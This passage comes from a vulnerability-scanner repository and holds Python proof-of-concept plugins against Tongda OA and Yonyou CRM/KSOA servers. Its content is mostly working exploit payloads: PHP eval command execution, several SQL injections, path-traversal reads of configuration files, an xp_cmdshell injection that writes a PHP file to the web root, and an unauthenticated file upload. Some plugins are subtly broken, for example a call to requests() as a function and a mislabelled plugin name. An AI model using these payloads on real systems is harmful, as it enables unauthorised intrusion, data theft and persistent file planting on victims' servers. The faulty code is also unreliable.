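    One GET is sent with the fixed query string below (kept byte-for-byte).
    The target is flagged when the reply is HTTP 200 and contains the fixed
    marker ``1710125152912`` that the probe asks the server to echo.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (was the literal ``5``).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` (the probed
        URL) is added only when the target is flagged.
    """
    result = {
        'name': '通达OA v11.9 getdata 任意命令执行漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'Accept': '*/*',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Cache-Control': 'no-cache',
        'Pragma': 'no-cache',
    }
    vurl = urllib.parse.urljoin(url, "/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyAxNzEwMTI1MTUyOTEyOw==%22)))%3B/*&id=19&module=Carouselimage")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 200 and '1710125152912' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result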
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/tongda_oa_qyapp-vote-submit_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re, urllib
3 |
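def verify(url, timeout=3):
    """Probe a Tongda OA host for boolean-blind SQL injection in ``qyapp.vote.submit.php``.

    Flow:
      1. A plain GET fingerprints the endpoint; only an HTTP 200 is probed.
      2. Two POSTs are sent with the fixed ``submitData`` forms below, one
         built to be true and one to be false. The target is flagged when the
         "false" reply is longer than the "true" reply and contains
         ``请联系管理员``.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (was a hard-coded local).

    Returns:
        dict with ``name``, ``vulnerable``, ``url``, ``method``, ``position``
        and ``param``; ``vurl`` and ``payload`` are added only when the target
        is flagged.
    """
    result = {
        'name': '通达OA sqli-布尔盲注(/mobile/api/qyapp.vote.submit.php)',
        'vulnerable': False,
        'url': url,
        'method': 'post',
        'position': 'data',
        'param': 'submitData',
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0',
        "Content-Type": "application/x-www-form-urlencoded",
    }
    payload = '/mobile/api/qyapp.vote.submit.php'
    vurl = urllib.parse.urljoin(url, payload)
    sqli_data_true = 'submitData={"a":{"vote_type":"1","vote_id":"if((select 995=995),1,2*1e308)","value":"1"}}'
    sqli_data_false = 'submitData={"a":{"vote_type":"1","vote_id":"if((select 3353=14451),1,2*1e308)","value":"1"}}'
    try:
        # verify=False (kept from the original) disables TLS certificate
        # checking so self-signed targets can be scanned.
        rep1 = requests.get(vurl, timeout=timeout, verify=False)
        if rep1.status_code == 200:
            true_rep = requests.post(vurl, headers=headers, data=sqli_data_true, timeout=timeout, verify=False)
            false_rep = requests.post(vurl, headers=headers, data=sqli_data_false, timeout=timeout, verify=False)
            if len(false_rep.text) > len(true_rep.text) and re.search("请联系管理员", false_rep.text):
                result['vulnerable'] = True
                result['vurl'] = vurl
                result['payload'] = sqli_data_true
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result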
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/tongda_sqli_getdata_php.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re, urllib
3 |
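def verify(url, timeout=3):
    """Probe a Tongda OA host for SQL injection in ``/general/reportshop/utils/get_datas.php``.

    Flow:
      1. A plain GET fingerprints the endpoint; only an HTTP 200 containing
         ``未指定业务`` is probed further.
      2. A GET with the fixed raw query string ``payload`` (kept byte-for-byte)
         is sent; an HTTP 200 reply containing a 26-character ``[a-z0-9]`` run
         flags the target.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (was a hard-coded local).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``vurl`` (the second,
        payload-carrying URL) is added only when the target is flagged.
    """
    result = {
        'name': '通达OA sql注入(/general/reportshop/utils/get_datas.php)',
        'vulnerable': False,
        'url': url,
    }
    payload = r'''?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5%20whe\re%201={`\=%27`%201}%20un\ion%20(s\elect%20uid,sid%20fr\om%20user_online%20whe\re%201\={`=`%201})--%20%27'''
    endpoint = '/general/reportshop/utils/get_datas.php'
    vurl = urllib.parse.urljoin(url, endpoint)
    vurl2 = urllib.parse.urljoin(url, endpoint + payload)
    try:
        # verify=False (kept from the original) disables TLS certificate
        # checking so self-signed targets can be scanned.
        rep1 = requests.get(vurl, timeout=timeout, verify=False)
        if rep1.status_code == 200 and re.search("未指定业务", rep1.text):
            rep2 = requests.get(vurl2, timeout=timeout, verify=False)
            if rep2.status_code == 200 and re.search("[a-z0-9]{26}", rep2.text):
                result['vulnerable'] = True
                result['vurl'] = vurl2
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result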
24 |
--------------------------------------------------------------------------------
/pocs/web/OA/tongda/tongda_videofile_fileread.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib, re
3 |
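def verify(url, timeout=3):
    """Probe a Tongda OA v2017 host for the ``video_file.php`` arbitrary file download.

    One GET asks ``video_file.php`` for ``oa_config.php`` via the fixed
    ``MEDIA_DIR``/``MEDIA_NAME`` query below. The target is flagged when the
    reply is HTTP 200 and contains both
    ``$ROOT_PATH=getenv("DOCUMENT_ROOT");`` and
    ``$ATTACH_PATH=$ROOT_PATH."attachment/";``.

    The two regexes are now raw strings: ``\\$`` and ``\\(`` in a plain
    literal are invalid escapes (SyntaxWarning on Python 3.12+); the
    compiled patterns are unchanged.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (was a hard-coded local).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``vurl`` is added only
        when the target is flagged.
    """
    result = {
        'name': '通达OA v2017 video_file.php 任意文件下载漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0',
        "Content-Type": "application/x-www-form-urlencoded",
    }
    payload = '/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php'
    vurl = urllib.parse.urljoin(url, payload)
    root_path_re = r'\$ROOT_PATH=getenv\("DOCUMENT_ROOT"\);'
    attach_path_re = r'\$ATTACH_PATH=\$ROOT_PATH\."attachment/";'
    try:
        # verify=False (kept from the original) disables TLS certificate
        # checking so self-signed targets can be scanned.
        res = requests.get(vurl, headers=headers, timeout=timeout, verify=False)
        if res.status_code == 200 and re.search(root_path_re, res.text) and re.search(attach_path_re, res.text):
            result['vulnerable'] = True
            result['vurl'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result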
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_downloadfile_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_downloadfile_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_getemaildata_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_getemaildata_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_help2_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_help2_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_reservationcomplete.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_reservationcomplete.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_swfupload__fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_swfupload__fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_uploadfile_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/CRM/__pycache__/yongyou_crm_uploadfile_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/yongyou_crm_downloadfile_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
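def verify(url, timeout=5):
    """Probe a Yonyou U8-CRM host for the ``downloadfile.php`` arbitrary file read.

    One GET is sent to ``/pub/downloadfile.php`` with the fixed query below
    (it asks for ``apache/php.ini``). The target is flagged when the reply is
    HTTP 200 and contains ``[PHP]``, the first section header of a php.ini.

    Args:
        url: Base URL of the target; the probe path is joined onto it.
        timeout: Per-request timeout in seconds (the original had none, so a
            silent host could stall the scan).

    Returns:
        dict with ``name``, ``vulnerable`` and ``url``; ``verify`` (the probed
        URL) is added only when the target is flagged.
    """
    result = {
        'name': '用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞',
        'vulnerable': False,
        'url': url,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'close',
    }
    vurl = urllib.parse.urljoin(url, "/pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../apache/php.ini")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 200 and '[PHP]' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except Exception:
        # Request failures mean "not confirmed"; narrowed from a bare
        # ``except:`` so KeyboardInterrupt still stops the scan.
        return result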
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/yongyou_crm_help2_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou CRM host for the help2.php file-read issue.

    Sends one GET to ``/pub/help2.php`` with a ``key`` parameter containing a
    ``../`` traversal sequence and treats an HTTP 200 whose body contains
    ``PHP`` as confirmation.

    Args:
        url: Base URL of the target; the probe path is joined onto it.

    Returns:
        The result dict with ``name``, ``url``, ``vulnerable`` and -- only when
        the indicator matched -- ``verify`` (the full probe URL).
    """
    relsult = {
        'name': '用友CRM 任意文件读取漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection':'close'
    }
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/pub/help2.php?key=../../apache/php.ini")
    try:
        # No timeout: an unresponsive host can stall this call indefinitely.
        response = requests.get(vurl, headers=headers)
        # 'PHP' is a weak indicator: ordinary pages may contain that substring,
        # so expect false positives compared with the sibling plugin's '[PHP]'.
        if response.status_code == 200 and 'PHP' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the ``if`` above, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return relsult

    except:
        # Bare except: any failure (connection error, unexpected exception,
        # even KeyboardInterrupt) is reported as "not vulnerable".
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/yongyou_crm_reservationcomplete.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou CRM host for the reservationcomplete.php logic flaw.

    Two requests: a GET to ``/background/reservationcomplete.php?ID=1`` and,
    if that returns 200, a second GET to the base URL.  The target is flagged
    when the second response is 200 and its body contains the literal
    ``"msg": "bgsesstimeout-", "serverName"``.

    Args:
        url: Base URL of the target; also fetched directly by the second request.

    Returns:
        The result dict with ``name``, ``url``, ``vulnerable`` and -- only when
        the indicator matched -- ``verify`` (the first probe URL).
    """
    relsult = {
        'name': '用友CRM系统存在逻辑漏洞直接登录后台',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection':'close'
    }
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/background/reservationcomplete.php?ID=1")
    try:
        # No timeout on either call: an unresponsive host can stall indefinitely.
        response = requests.get(vurl, headers=headers)
        if response.status_code == 200:
            response2 = requests.get(url, headers=headers)
            if response2.status_code == 200 and '"msg": "bgsesstimeout-", "serverName"' in response2.text:
                relsult['vulnerable'] = True
                relsult['verify'] = vurl
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the inner ``if``, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return relsult

    except:
        # Bare except: any failure (connection error, unexpected exception,
        # even KeyboardInterrupt) is reported as "not vulnerable".
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/yongyou_crm_reservationcomplete_rce.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou U8-CRM host for SQL injection via reservationcomplete.php.

    This probe is NOT read-only: the ``ID`` value in ``vurl`` asks the target
    to write ``helloadmin.php`` under its web root, and the second request then
    fetches ``/helloadmin.php`` and looks for ``hello`` in the body.  Running
    it against a vulnerable host leaves that file behind as an artifact, which
    is also what incident responders should look for.

    Args:
        url: Base URL of the target; the probe path is joined onto it.

    Returns:
        The result dict with ``name``, ``url``, ``vulnerable`` and -- only when
        the indicator matched -- ``verify`` (the full probe URL).
    """
    relsult = {
        'name': '用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞(RCE)',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection':'close'
    }
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\U8SOFT\turbocrm70\code\www\helloadmin.php%27;")
    try:
        # No timeout on either call: an unresponsive host can stall indefinitely.
        response = requests(vurl, headers=headers)
        if response.status_code == 200:
            # Plain string concatenation here, unlike the urljoin used for vurl.
            rurl = url + '/helloadmin.php'
            response = requests.get(rurl)
            if response.status_code == 200 and 'hello' in response.text:
                relsult['vulnerable'] = True
                relsult['verify'] = vurl
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the inner ``if``, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return relsult

    except:
        # Bare except: any failure (connection error, unexpected exception,
        # even KeyboardInterrupt) is reported as "not vulnerable".
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/CRM/yongyou_crm_swfupload__fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou CRM host for unrestricted upload via swfupload.php.

    This probe is NOT read-only: it POSTs a hand-built multipart body (a file
    part named ``s.php `` with filler content) to
    ``/ajax/swfupload.php?DontCheckLogin=1&vname=file`` and flags the target
    when the 200 response body contains ``tmp.php``.  A vulnerable host keeps
    the uploaded file, so expect an artifact under ``/tmpfile/``.

    Args:
        url: Base URL of the target; the probe path is joined onto it.

    Returns:
        The result dict with ``name``, ``url``, ``vulnerable`` and -- only when
        the indicator matched -- ``verify``.  Note that ``verify`` here is a
        placeholder path (``***.tmp.php``), not the real stored filename.
    """
    relsult = {
        'name': '用友crm-swfupload接口存在任意文件上传漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'multipart/form-data;boundary=----269520967239406871642430066855'
    }
    # The boundary below must stay in sync with the Content-Type header above.
    data = '''------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php "
Content-Type: application/octet-stream

asdddddd
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--'''
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/ajax/swfupload.php?DontCheckLogin=1&vname=file")
    try:
        # No timeout: an unresponsive host can stall this call indefinitely.
        response = requests.post(vurl, headers=headers, data=data)
        if response.status_code == 200 and 'tmp.php' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = url + '/tmpfile/***.tmp.php'
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the ``if`` above, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return relsult

    except:
        # Bare except: any failure (connection error, unexpected exception,
        # even KeyboardInterrupt) is reported as "not vulnerable".
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PreviewKPQT_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PreviewKPQT_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PrintZPFB_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PrintZPFB_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PrintZPYG_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PrintZPYG_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PrintZPZP_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_PrintZPZP_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_QueryService_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_QueryService_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_linkadd_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_linkadd_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_magefield_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ksoa_magefield_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ufida_ksoa_fileupload_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/KSOA/__pycache__/yongyou_ufida_ksoa_fileupload_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_PreviewKPQT_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou KSOA host for SQL injection via PreviewKPQT.jsp.

    Sends one GET to ``/kp/PreviewKPQT.jsp`` with a UNION-based payload in
    ``KPQTID`` and flags the target when the 200 response body contains
    ``e10adc3949ba59abbe56e057f20f883e`` (MD5 of ``123456``).

    Args:
        url: Base URL of the target; the probe path is joined onto it.

    Returns:
        The result dict with ``name``, ``url``, ``vulnerable`` and -- only when
        the indicator matched -- ``verify`` (the full probe URL).
    """
    relsult = {
        'name': '用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
    }
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/kp/PreviewKPQT.jsp?KPQType=KPQT&KPQTID=1%27+union+select+sys.fn_varbintohexstr(hashbytes(%27md5%27,%123456%27)),2,3+--+")
    try:
        # No timeout: an unresponsive host can stall this call indefinitely.
        response = requests.get(vurl, headers=headers)
        if response.status_code == 200 and 'e10adc3949ba59abbe56e057f20f883e' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the ``if`` above, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return relsult

    except:
        # Bare except: any failure (connection error, unexpected exception,
        # even KeyboardInterrupt) is reported as "not vulnerable".
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_PrintZPFB_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou KSOA host for SQL injection via PrintZPFB.jsp.

    Sends one GET to ``/kp/PrintZPFB.jsp`` with a UNION-based payload in
    ``zpfbbh`` and flags the target on a 200 response whose body contains
    ``1,2`` or ``Microsoft``.

    Args:
        url: Base URL of the target; the probe path is joined onto it.

    Returns:
        The result dict with ``name``, ``url``, ``vulnerable`` and -- only when
        the indicator matched -- ``verify`` (the full probe URL).
    """
    relsult = {
        # NOTE(review): the report name refers to PreviewKPQT.jsp, but this
        # plugin probes PrintZPFB.jsp; findings will be mislabelled in output.
        'name': '用友时空KSOA系统接口PreviewKPQT.jsp存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
    }
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/kp/PrintZPFB.jsp?zpfbbh=1%27+union+select+1,2,3,@@VERSION,db_name()+--+")
    try:
        # No timeout: an unresponsive host can stall this call indefinitely.
        response = requests.get(vurl, headers=headers)
        # Both indicators are short, common substrings -- expect false positives.
        if response.status_code == 200 and ('1,2' in response.text or 'Microsoft' in response.text):
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the ``if`` above, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return relsult

    except:
        # Bare except: any failure (connection error, unexpected exception,
        # even KeyboardInterrupt) is reported as "not vulnerable".
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_PrintZPYG_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou KSOA host for SQL injection via PrintZPYG.jsp.

    Sends one GET to ``/kp/PrintZPYG.jsp`` with a UNION-based payload in
    ``zpjhid``.  The target is flagged when a 200 response contains both
    ``14`` and ``13``, or when the body contains ``ksoa`` at all.

    Args:
        url: Base URL of the target; the probe path is joined onto it.

    Returns:
        The result dict with ``name``, ``url``, ``vulnerable`` and -- only when
        the indicator matched -- ``verify`` (the full probe URL).
    """
    relsult = {
        'name': '用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
    }
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13,14+--+")
    try:
        # No timeout: an unresponsive host can stall this call indefinitely.
        response = requests.get(vurl, headers=headers)
        # Weak indicators: '13'/'14' are common digit pairs, and the ``or 'ksoa'``
        # branch ignores the status code, so any page (even an error page)
        # mentioning the product name is flagged -- expect false positives.
        if (response.status_code == 200 and '14' in response.text and '13' in response.text) or 'ksoa' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the ``if`` above, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return relsult

    except:
        # Bare except: any failure (connection error, unexpected exception,
        # even KeyboardInterrupt) is reported as "not vulnerable".
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_PrintZPZP_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou KSOA host for SQL injection via PrintZPZP.jsp.

    Sends one GET to ``/kp/PrintZPZP.jsp`` with a UNION-based payload in
    ``zpshqid``.  The target is flagged when a 200 response contains both
    ``12`` and ``13``, or when the body contains ``ksoa`` at all.

    Args:
        url: Base URL of the target; the probe path is joined onto it.

    Returns:
        The result dict with ``name``, ``url``, ``vulnerable`` and -- only when
        the indicator matched -- ``verify`` (the full probe URL).
    """
    relsult = {
        'name': '用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
    }
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/kp/PrintZPZP.jsp?zpshqid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13+--+")
    try:
        # No timeout: an unresponsive host can stall this call indefinitely.
        response = requests.get(vurl, headers=headers)
        # Weak indicators: '12'/'13' are common digit pairs, and the ``or 'ksoa'``
        # branch ignores the status code, so any page mentioning the product
        # name is flagged -- expect false positives.
        if (response.status_code == 200 and '12' in response.text and '13' in response.text) or 'ksoa' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the ``if`` above, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return relsult

    except:
        # Bare except: any failure (connection error, unexpected exception,
        # even KeyboardInterrupt) is reported as "not vulnerable".
        return relsult
